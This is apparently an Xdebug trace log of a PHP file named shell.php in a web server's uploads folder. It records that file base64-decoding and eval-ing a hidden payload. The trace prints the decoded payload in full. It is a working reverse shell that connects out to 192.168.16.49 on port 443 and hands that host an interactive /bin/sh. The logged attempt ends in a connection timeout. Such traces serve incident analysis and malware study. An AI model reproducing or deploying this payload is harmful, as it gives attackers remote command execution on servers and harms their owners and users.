Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 01:05:06.016652]
1	0	1	0.000137	393512
1	3	0	0.000196	396496	{main}	1		/var/www/html/uploads/shell.php	0	0
2	4	0	0.000213	396496	base64_decode	0		/var/www/html/uploads/shell.php	1	1	'PD9waHAKc2V0X3RpbWVfbGltaXQgKDApOwokVkVSU0lPTiA9ICIxLjAiOwokaXAgPSAnMTkyLjE2OC4xNi40OSc7IAokcG9ydCA9IDQ0MzsgICAgICAgCiRjaHVua19zaXplID0gMTQwMDsKJHdyaXRlX2EgPSBudWxsOwokZXJyb3JfYSA9IG51bGw7CiRzaGVsbCA9ICd1bmFtZSAtYTsgdzsgaWQ7IC9iaW4vc2ggLWknOwokZGFlbW9uID0gMDsKJGRlYnVnID0gMDsKCmlmIChmdW5jdGlvbl9leGlzdHMoJ3BjbnRsX2ZvcmsnKSkgewoJJHBpZCA9IHBjbnRsX2ZvcmsoKTsKCQoJaWYgKCRwaWQgPT0gLTEpIHsKCQlwcmludGl0KCJFUlJPUjogQ2FuJ3QgZm9yayIpOwoJCWV4aXQoMSk7Cgl9CgkKCWlmICgkcGlkKSB7CgkJZXhpdCgwKTsgIAoJfQoJaWYgKHBvc2l4X3NldHNpZCgp'
2	4	1	0.000257	399600
2	4	R			'<?php\nset_time_limit (0);\n$VERSION = "1.0";\n$ip = \'192.168.16.49\'; \n$port = 443;       \n$chunk_size = 1400;\n$write_a = null;\n$error_a = null;\n$shell = \'uname -a; w; id; /bin/sh -i\';\n$daemon = 0;\n$debug = 0;\n\nif (function_exists(\'pcntl_fork\')) {\n\t$pid = pcntl_fork();\n\t\n\tif ($pid == -1) {\n\t\tprintit("ERROR: Can\'t fork");\n\t\texit(1);\n\t}\n\t\n\tif ($pid) {\n\t\texit(0);  \n\t}\n\tif (posix_setsid() == -1) {\n\t\tprintit("Error: Can\'t setsid()");\n\t\texit(1);\n\t}\n\n\t$daemon = '
2	5	0	0.000418	424536	eval	1	'?><?php\nset_time_limit (0);\n$VERSION = "1.0";\n$ip = \'192.168.16.49\'; \n$port = 443;       \n$chunk_size = 1400;\n$write_a = null;\n$error_a = null;\n$shell = \'uname -a; w; id; /bin/sh -i\';\n$daemon = 0;\n$debug = 0;\n\nif (function_exists(\'pcntl_fork\')) {\n\t$pid = pcntl_fork();\n\t\n\tif ($pid == -1) {\n\t\tprintit("ERROR: Can\'t fork");\n\t\texit(1);\n\t}\n\t\n\tif ($pid) {\n\t\texit(0);  \n\t}\n\tif (posix_setsid() == -1) {\n\t\tprintit("Error: Can\'t setsid()");\n\t\texit(1);\n\t}\n\n\t$daemon = 1;\n} else {\n\tprintit("WARNING: Failed to daemonise.  This is quite common and not fatal.");\n}\n\nchdir("/");\n\numask(0);\n\n$sock = fsockopen($ip, $port, $errno, $errstr, 30);\nif (!$sock) {\n\tprintit("$errstr ($errno)");\n\texit(1);\n}\n\n$descriptorspec = array(\n   0 => array("pipe", "r"),\n   1 => array("pipe", "w"),\n   2 => array("pipe", "w") \n);\n\n$process = proc_open($shell, $descriptorspec, $pipes);\n\nif (!is_resource($process)) {\n\tprintit("ERROR: Can\'t spawn shell");\n\texit(1);\n}\nstream_set_blocking($pipes[0], 0);\nstream_set_blocking($pipes[1], 0);\nstream_set_blocking($pipes[2], 0);\nstream_set_blocking($sock, 0);\n\nprintit("Successfully opened reverse shell to $ip:$port");\n\nwhile (1) {\n\tif (feof($sock)) {\n\t\tprintit("ERROR: Shell connection terminated");\n\t\tbreak;\n\t}\n\n\tif (feof($pipes[1])) {\n\t\tprintit("ERROR: Shell process terminated");\n\t\tbreak;\n\t}\n\n\t$read_a = array($sock, $pipes[1], $pipes[2]);\n\t$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);\n\n\tif (in_array($sock, $read_a)) {\n\t\tif ($debug) printit("SOCK READ");\n\t\t$input = fread($sock, $chunk_size);\n\t\tif ($debug) printit("SOCK: $input");\n\t\tfwrite($pipes[0], $input);\n\t}\n\n\tif (in_array($pipes[1], $read_a)) {\n\t\tif ($debug) printit("STDOUT READ");\n\t\t$input = fread($pipes[1], $chunk_size);\n\t\tif ($debug) printit("STDOUT: $input");\n\t\tfwrite($sock, $input);\n\t}\n\n\tif (in_array($pipes[2], $read_a)) {\n\t\tif ($debug) printit("STDERR READ");\n\t\t$input = fread($pipes[2], $chunk_size);\n\t\tif ($debug) printit("STDERR: $input");\n\t\tfwrite($sock, $input);\n\t}\n}\n\nfclose($sock);\nfclose($pipes[0]);\nfclose($pipes[1]);\nfclose($pipes[2]);\nproc_close($process);\n\nfunction printit ($string) {\n\tif (!$daemon) {\n\t\tprint "$string\\n";\n\t}\n}\n\n?> \n'	/var/www/html/uploads/shell.php	1	0
3	6	0	0.000487	424536	set_time_limit	0		/var/www/html/uploads/shell.php(1) : eval()'d code	2	1	0
3	6	1	0.000504	424600
3	6	R			FALSE
2		A						/var/www/html/uploads/shell.php(1) : eval()'d code	3	$VERSION = '1.0'
2		A						/var/www/html/uploads/shell.php(1) : eval()'d code	4	$ip = '192.168.16.49'
2		A						/var/www/html/uploads/shell.php(1) : eval()'d code	5	$port = 443
2		A						/var/www/html/uploads/shell.php(1) : eval()'d code	6	$chunk_size = 1400
2		A						/var/www/html/uploads/shell.php(1) : eval()'d code	7	$write_a = NULL
2		A						/var/www/html/uploads/shell.php(1) : eval()'d code	8	$error_a = NULL
2		A						/var/www/html/uploads/shell.php(1) : eval()'d code	9	$shell = 'uname -a; w; id; /bin/sh -i'
2		A						/var/www/html/uploads/shell.php(1) : eval()'d code	10	$daemon = 0
2		A						/var/www/html/uploads/shell.php(1) : eval()'d code	11	$debug = 0
3	7	0	0.000617	424568	function_exists	0		/var/www/html/uploads/shell.php(1) : eval()'d code	13	1	'pcntl_fork'
3	7	1	0.000631	424608
3	7	R			FALSE
3	8	0	0.000645	424568	printit	1		/var/www/html/uploads/shell.php(1) : eval()'d code	31	1	'WARNING: Failed to daemonise.  This is quite common and not fatal.'
3	8	1	0.000678	424568
3	9	0	0.000686	424568	chdir	0		/var/www/html/uploads/shell.php(1) : eval()'d code	34	1	'/'
3	9	1	0.000703	424640
3	9	R			TRUE
3	10	0	0.000717	424600	umask	0		/var/www/html/uploads/shell.php(1) : eval()'d code	36	1	0
3	10	1	0.000731	424632
3	10	R			18
3	11	0	0.000744	424648	fsockopen	0		/var/www/html/uploads/shell.php(1) : eval()'d code	38	5	'192.168.16.49'	443	NULL	NULL	30
3	11	1	30.030531	424864
3	11	R			FALSE
2		A						/var/www/html/uploads/shell.php(1) : eval()'d code	38	$sock = FALSE
3	12	0	30.030580	424752	printit	1		/var/www/html/uploads/shell.php(1) : eval()'d code	40	1	'Connection timed out (110)'
3	12	1	30.030604	424752
			30.030643	345408
TRACE END   [2023-02-13 01:05:36.047185]